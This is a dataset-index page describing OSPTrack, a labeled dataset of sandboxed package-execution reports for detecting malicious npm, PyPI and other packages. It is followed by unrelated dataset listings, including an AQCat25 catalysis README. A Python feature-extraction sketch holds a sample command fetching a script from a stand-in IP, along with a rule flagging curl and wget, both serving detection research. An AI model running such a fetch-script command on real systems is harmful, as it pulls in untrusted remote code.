
OSPTrack | Open-Source Software Supply Chain Security Dataset | Malware Detection Dataset

arXiv updated 2024-11-22 · Indexed 2024-11-26
Open-source software supply chain security
Malware detection
Download link:
https://github.com/ossf/package-analysis
Resource overview:
OSPTrack is a labeled dataset created by the University of Glasgow that focuses on the simulated execution of open-source software packages. It spans multiple ecosystems — npm, PyPI, crates.io, NuGet, and Packagist — and contains 9,461 package reports, 1,962 of which are malicious. By capturing the features generated while packages and libraries execute in an isolated environment, such as files, sockets, commands, and DNS records, the dataset helps identify malicious indicators. Its creation pipeline includes multi-process analysis, report parsing, and feature extraction, and it targets vulnerability detection in the open-source software supply chain, particularly when access to source code is limited.
Provided by:
University of Glasgow
Created:
2024-11-22
AI-Generated Summary
Dataset Introduction
Construction
OSPTrack was built by closely monitoring open-source packages as they execute in a simulated environment. Using the package-analysis tool, the research team simulated package execution in an isolated sandbox across multiple ecosystems (npm, PyPI, crates.io, NuGet, and Packagist). In this way the dataset captures both static and dynamic runtime features, including file operations, socket connections, command executions, and DNS records. The team also integrated public data from BigQuery to ensure sample diversity and coverage. Finally, by parsing the generated reports and extracting features, they assembled a comprehensive dataset of 9,461 package reports, 1,962 of which are malicious.
Characteristics
A distinguishing characteristic of OSPTrack is its rich feature set and detailed labeling. Beyond the features common in static code analysis, the dataset introduces runtime dynamic features such as network interactions and system calls, enabling more comprehensive and precise detection. Its labels not only separate malicious from benign packages but are further subdivided into attack types such as data exfiltration and malicious command execution, providing a finer-grained basis for analysis. These multi-dimensional features and detailed labels make OSPTrack an important resource for research on open-source software supply chain security.
Usage
OSPTrack suits a range of research scenarios, particularly in open-source software supply chain security. Researchers can use it to train machine learning models that distinguish benign from malicious packages and identify potential vulnerabilities at runtime. Its detailed labels and multi-dimensional features support both supervised and unsupervised learning, aiding the development of efficient detection algorithms. The dataset's diversity also enables cross-ecosystem comparisons, deepening understanding of how malicious packages behave in different environments. Building on such analyses, researchers can propose more effective defenses and improve the overall security of the open-source software supply chain.
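As a minimal sketch of how such a model might be fed — not the authors' actual pipeline, and with an assumed report schema — the behavior categories OSPTrack captures (files, sockets, commands, DNS records) can be flattened into a fixed-length numeric vector per package report:

```python
# Hypothetical sketch: map one package-analysis-style report to a feature
# vector for a malware classifier. The report keys used here (files,
# sockets, commands, dns) mirror OSPTrack's feature categories, but the
# exact schema is an assumption for illustration.

def extract_features(report: dict) -> list[float]:
    """Turn one package report into a fixed-length feature vector."""
    files = report.get("files", [])
    sockets = report.get("sockets", [])
    commands = report.get("commands", [])
    dns = report.get("dns", [])

    return [
        # Simple count features, one per behavior category.
        float(len(files)),
        float(len(sockets)),
        float(len(commands)),
        float(len(dns)),
        # Binary indicators for behaviors often seen in exfiltration.
        float(any(cmd.startswith(("curl", "wget")) for cmd in commands)),
        float(any(s.get("port") in (80, 443) for s in sockets)),
    ]

report = {
    "files": ["/tmp/payload.bin"],
    "sockets": [{"address": "203.0.113.5", "port": 443}],
    "commands": ["curl http://203.0.113.5/x.sh"],
    "dns": ["example-c2.test"],
}
print(extract_features(report))  # [1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
```

Vectors like these can then be fed to any off-the-shelf classifier; the dataset's sub-labels additionally allow multi-class training over attack types rather than a binary benign/malicious split.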
Background and Challenges
Background
OSPTrack was created by Zhuoran Tan, Christos Anagnostopoulos, and Jeremy Singer at the University of Glasgow to address the lack of runtime features in open-source software (OSS) supply chain security. Released in 2024, the dataset spans multiple ecosystems — npm, PyPI, crates.io, NuGet, and Packagist — and captures the execution features of packages and libraries in an isolated environment. It contains 9,461 package reports, 1,962 of them malicious, with static and dynamic features such as files, sockets, commands, and DNS records. Detailed sub-labels annotate attack types, which helps identify malicious indicators when source code access is limited and supports effective runtime detection.
Current Challenges
The main challenges OSPTrack faces are: (1) domain challenges, such as capturing the runtime features of OSS embedded in complex systems; and (2) construction challenges, such as packages that could not be analyzed due to missing dependencies, and packages that stalled the simulation and blocked analysis of subsequent ones. In addition, because source code is unavailable, the simulated scenarios cannot fully capture the injection process, and some malicious packages were excluded from the dataset by timeout settings. The authors plan to update the dataset periodically to include a broader and more diverse set of malicious reports.
Common Scenarios
Classic Use Cases
The classic use cases for OSPTrack center on open-source software supply chain security, especially detecting the runtime behavior of malicious packages. By simulating package execution across multiple ecosystems, the dataset captures static and dynamic features such as file operations, network sockets, command executions, and DNS records. Their detailed annotation lets researchers develop and validate machine-learning-based malware detection models, particularly when source code access is limited.
Practical Applications
In practice, OSPTrack can be used to develop and deploy real-time malware detection systems, particularly in open-source software supply chain management. For example, an enterprise can use models trained on the dataset to monitor and analyze the runtime behavior of its packages, detecting and blocking potentially malicious activity in time. The dataset can also serve education and training, helping security professionals better understand and respond to complex supply chain attacks.
Derived Work
The release of OSPTrack has spurred a series of related research efforts in open-source software supply chain security. For example, some researchers have used the dataset to develop new machine learning models that improve the accuracy and efficiency of malware detection. Other work explores cross-ecosystem comparisons of malicious package behavior based on OSPTrack, and graph-based representation learning models that better capture and understand complex attack patterns.
The content above was collected and summarized by AI.
User Comments
Are there any related papers or references?
What is the background behind this dataset's creation?
Who are the dataset's authors?
Can you help me contact the dataset's authors?
How do I download this dataset?
Data Topics
Embodied AI — 4,099 datasets · 8 institutions
Large models — 439 datasets · 10 institutions
UAVs — 37 datasets · 6 institutions
Instruction tuning — 36 datasets · 6 institutions
Protein structure — 50 datasets · 8 institutions
Spatial intelligence — 21 datasets · 5 institutions
Popular Datasets

aqcat25

<h1 align="center" style="font-size: 36px;"> <span style="color: #FFD700;">AQCat25 Dataset:</span> Unlocking spin-aware, high-fidelity machine learning potentials for heterogeneous catalysis </h1>

![dataset_schematic](https://cdn-uploads.huggingface.co/production/uploads/67256b7931376d3bacb18de0/W1Orc_AmSgRez5iKH0qjC.jpeg)

This repository contains the **AQCat25 dataset**. AQCat25-EV2 models can be accessed [here](https://huggingface.co/SandboxAQ/aqcat25-ev2).

The AQCat25 dataset provides a large and diverse collection of **13.5 million** DFT calculation trajectories, encompassing approximately 5K materials and 47K intermediate-catalyst systems. It is designed to complement existing large-scale datasets by providing calculations at **higher fidelity** and including critical **spin-polarized** systems, which are essential for accurately modeling many industrially relevant catalysts.

Please see our [website](https://www.sandboxaq.com/aqcat25) and [paper](https://cdn.prod.website-files.com/622a3cfaa89636b753810f04/68ffc1e7c907b6088573ba8c_AQCat25.pdf) for more details about the impact of the dataset and [models](https://huggingface.co/SandboxAQ/aqcat25-ev2).

## 1. AQCat25 Dataset Details

This repository uses a hybrid approach, providing lightweight, queryable Parquet files for each split alongside compressed archives (`.tar.gz`) of the raw ASE database files. More details can be found below.

### Queryable Metadata (Parquet Files)

A set of Parquet files provides a "table of contents" for the dataset. They can be loaded directly with the `datasets` library for fast browsing and filtering. Each file contains the following columns:

| Column Name | Data Type | Description | Example |
| :--- | :--- | :--- | :--- |
| `frame_id` | string | **Unique ID for this dataset**. Formatted as `database_name::index`. | `data.0015.aselmdb::42` |
| `adsorption_energy` | float | **Key Target**. The calculated adsorption energy in eV. | -1.542 |
| `total_energy` | float | The raw total energy of the adslab system from DFT (in eV). | -567.123 |
| `fmax` | float | The maximum force magnitude on any single atom in eV/Å. | 0.028 |
| `is_spin_off` | boolean | `True` if the system is non-magnetic (VASP ISPIN=1). | `false` |
| `mag` | float | The total magnetization of the system (µB). | 32.619 |
| `slab_id` | string | Identifier for the clean slab structure. | `mp-1216478_001_2_False` |
| `adsorbate` | string | SMILES or chemical formula of the adsorbate. | `*NH2N(CH3)2` |
| `is_rerun` | boolean | `True` if the calculation is a continuation. | `false` |
| `is_md` | boolean | `True` if the frame is from a molecular dynamics run. | `false` |
| `sid` | string | The original system ID from the source data. | `vadslabboth_82` |
| `fid` | integer | The original frame index (step number) from the source VASP calculation. | 0 |

---

#### Understanding `frame_id` and `fid`

| Field | Purpose | Example |
| :--- | :--- | :--- |
| `fid` | **Original Frame Index**: This is the step number from the original VASP relaxation (`ionic_steps`). It tells you where the frame came from in its source simulation. | `4` (the 5th frame of a specific VASP run) |
| `frame_id` | **Unique Dataset Pointer**: This is a new ID created for this specific dataset. It tells you exactly which file (`data.0015.aselmdb`) and which row (`101`) to look in to find the full atomic structure. | `data.0015.aselmdb::101` |

---

## Downloadable Data Archives

The full, raw data for each split is available for download in compressed `.tar.gz` archives. The table below provides direct download links. The queryable Parquet files for each split can be loaded directly using the `datasets` library as shown in the "Example Usage" section.

The data currently available for download (totaling ~11.1M frames, as listed in the table below) is the initial dataset version (v1.0) released on September 10, 2025.
The 13.5M frame count mentioned in our paper and the introduction includes additional data used to rebalance non-magnetic element systems and add a low-fidelity spin-on dataset. These new data splits will be added to this repository soon.

| Split Name | Structures | Archive Size | Download Link |
| :--- | :--- | :--- | :--- |
| ***In-Domain (ID)*** | | | |
| Train | `7,386,750` | `23.8 GB` | [`train_id.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/train_id.tar.gz) |
| Validation | `254,498` | `825 MB` | [`val_id.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/val_id.tar.gz) |
| Test | `260,647` | `850 MB` | [`test_id.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/test_id.tar.gz) |
| Slabs | `898,530` | `2.56 GB` | [`id_slabs.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/id_slabs.tar.gz) |
| ***Out-of-Distribution (OOD) Validation*** | | | |
| OOD Ads (Val) | `577,368` | `1.74 GB` | [`val_ood_ads.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/val_ood_ads.tar.gz) |
| OOD Materials (Val) | `317,642` | `963 MB` | [`val_ood_mat.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/val_ood_mat.tar.gz) |
| OOD Both (Val) | `294,824` | `880 MB` | [`val_ood_both.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/val_ood_both.tar.gz) |
| OOD Slabs (Val) | `28,971` | `83 MB` | [`val_ood_slabs.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/val_ood_slabs.tar.gz) |
| ***Out-of-Distribution (OOD) Test*** | | | |
| OOD Ads (Test) | `346,738` | `1.05 GB` | [`test_ood_ads.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/test_ood_ads.tar.gz) |
| OOD Materials (Test) | `315,931` | `993 MB` | [`test_ood_mat.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/test_ood_mat.tar.gz) |
| OOD Both (Test) | `355,504` | `1.1 GB` | [`test_ood_both.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/test_ood_both.tar.gz) |
| OOD Slabs (Test) | `35,936` | `109 MB` | [`test_ood_slabs.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/test_ood_slabs.tar.gz) |

---

## 2. Dataset Usage Guide

This guide outlines the recommended workflow for accessing and querying the AQCat25 dataset.

### 2.1 Initial Setup

Before you begin, you need to install the necessary libraries and authenticate with Hugging Face. This is a one-time setup.

```bash
pip install datasets pandas ase tqdm requests huggingface_hub ase-db-backends
```

**1. Create a Hugging Face Account:** If you don't have one, create an account at [huggingface.co](https://huggingface.co/join).

**2. Create an Access Token:** Navigate to your **Settings -> Access Tokens** page or click [here](https://huggingface.co/settings/tokens). Create a new token with at least **`read`** permissions. Copy this token to your clipboard.

**3. Log in via the Command Line:** Open your terminal and run the following command:

```bash
hf auth login
```

### 2.2 Get the Helper Scripts

You may copy the scripts directly from this repository, or download them by running the following in your local Python environment:

```python
from huggingface_hub import snapshot_download

snapshot_download(
    repo_id="SandboxAQ/aqcat25",
    repo_type="dataset",
    allow_patterns=["scripts/*", "README.md"],
    local_dir="./aqcat25",
)
```

This will create a local folder named `aqcat25` containing the `scripts/` directory.

### 2.3 Download Desired Dataset Splits

Data splits may be downloaded directly via the Hugging Face UI, or via the `download_split.py` script (found in `aqcat25/scripts/`).

```bash
python aqcat25/scripts/download_split.py --split val_id
```

This will download `val_id.tar.gz` and extract it to a new folder named `aqcat_data/val_id/`.
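The metadata can also be filtered by hand before reaching for the helper script. Below is a minimal sketch of that kind of query using pandas; the tiny in-memory frame stands in for a loaded split (in practice you would read the split's Parquet file), and only column names from the schema documented above are used:

```python
import pandas as pd

# Stand-in for one split's Parquet metadata. In practice, load the real
# file instead (e.g. pd.read_parquet(...) or datasets.load_dataset(...)).
meta = pd.DataFrame(
    {
        "frame_id": ["data.0015.aselmdb::42", "data.0016.aselmdb::7"],
        "adsorption_energy": [-1.542, -2.730],
        "adsorbate": ["*NH2N(CH3)2", "*CO"],
        "is_spin_off": [False, True],
    }
)

# Filter the way query_aqcat.py's flags do: by adsorbate + energy window.
hits = meta[(meta["adsorbate"] == "*CO") & (meta["adsorption_energy"] <= -2.0)]

# frame_id encodes which ASE db file and row hold the full structure.
db_file, row = hits.iloc[0]["frame_id"].split("::")
print(db_file, int(row))  # data.0016.aselmdb 7
```

Resolving `frame_id` this way is what makes the hybrid layout work: the Parquet files answer "which frames?" cheaply, and only the matching `.aselmdb` rows need to be touched for full structures.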
### 2.4 Query the Dataset

Use the `query_aqcat.py` script to filter the dataset and extract the specific atomic structures you need. It first queries the metadata on the Hub and then extracts the full structures from your locally downloaded files.

**Example 1: Find all CO and OH structures in the test set:**

```bash
python aqcat25/scripts/query_aqcat.py \
    --split test_id \
    --adsorbates "*CO" "*OH" \
    --data-root ./aqcat_data/test_id
```

**Example 2: Find magnetic, nonmetal-slab structures with low adsorption energy:**

```bash
python aqcat25/scripts/query_aqcat.py \
    --split val_ood_both \
    --max-energy -2.0 \
    --material-type nonmetal \
    --magnetism magnetic \
    --data-root ./aqcat_data/val_ood_both \
    --output-file low_energy_metals.extxyz
```

**Example 3: Find *COCH2OH on slabs containing both Ni and Se, with adsorption energy between -2.5 and -1.5 eV and a Miller index of 011:**

```bash
python aqcat25/scripts/query_aqcat.py \
    --split val_ood_ads \
    --adsorbates "*COCH2OH" \
    --min-energy -2.5 \
    --max-energy -1.5 \
    --contains-elements "Ni" "Se" \
    --element-filter-mode all \
    --facet 011 \
    --data-root ./aqcat_data/val_ood_ads \
    --output-file COCH2OH_on_ni_and_se.extxyz
```

---

## 3. How to Cite

If you use the AQCat25 dataset or the models in your research, please cite the following paper:

```
Omar Allam, Brook Wander, & Aayush R. Singh. (2025). AQCat25: Unlocking spin-aware, high-fidelity machine learning potentials for heterogeneous catalysis. arXiv preprint arXiv:2510.22938.
```

### BibTeX Entry

```bibtex
@article{allam2025aqcat25,
  title={{AQCat25: Unlocking spin-aware, high-fidelity machine learning potentials for heterogeneous catalysis}},
  author={Allam, Omar and Wander, Brook and Singh, Aayush R},
  journal={arXiv preprint arXiv:2510.22938},
  year={2025},
  eprint={2510.22938},
  archivePrefix={arXiv},
  primaryClass={cond-mat.mtrl-sci}
}
```

Indexed from ModelScope

OpenSonarDatasets

OpenSonarDatasets is a repository dedicated to aggregating open-source sonar datasets, aiming to support underwater research and development. The repository encourages researchers to extend the current collection, increasing the visibility of open-source sonar datasets and providing an easier way to find and compare them.

Indexed from GitHub

resume-conversations-llm-training

A high-quality career-conversation dataset for building AI that understands resumes, careers, and professional growth. Provided in structured JSONL format, it contains realistic Q&A on career development, technology trends, and professional skills, making it well suited for developers and AI practitioners building chatbots, career-advice tools, or LLM fine-tuning pipelines.
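JSONL means one JSON object per line, so loading it needs nothing beyond the standard library. A minimal sketch follows; the `prompt`/`response` field names and the inline sample are illustrative assumptions, not the dataset's documented schema:

```python
import io
import json

# Stand-in for an open file handle on a .jsonl file: one JSON object
# per line. Field names here are assumed for illustration.
raw = io.StringIO(
    '{"prompt": "How do I move from QA into backend work?", '
    '"response": "Start by contributing test tooling in the backend repo."}\n'
    '{"prompt": "Which skills matter for a data-engineering resume?", '
    '"response": "SQL, a workflow orchestrator, and one cloud platform."}\n'
)

# Parse line by line, skipping any blank lines.
records = [json.loads(line) for line in raw if line.strip()]
print(len(records))  # 2
print(records[0]["prompt"])
```

The same loop works unchanged with `open("data.jsonl")` in place of the `StringIO` stand-in, which is what makes JSONL convenient for streaming fine-tuning corpora record by record.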

Indexed from Hugging Face

emotions-dataset

The Emotions Dataset is a curated text dataset of 131,306 entries annotated with 13 distinct emotions, such as happiness, sadness, neutrality, and anger. It is designed to advance emotion classification, sentiment analysis, and natural language processing, and is suitable for building empathetic chatbots, mental-health tools, social-media analyzers, and more. At 7.41 MB, the dataset is easy to use on edge devices as well as in large projects.

Indexed from Hugging Face

VEDAI

The VEDAI dataset prepared for training YOLO models, containing images and labels for object detection and tracking.

Indexed from GitHub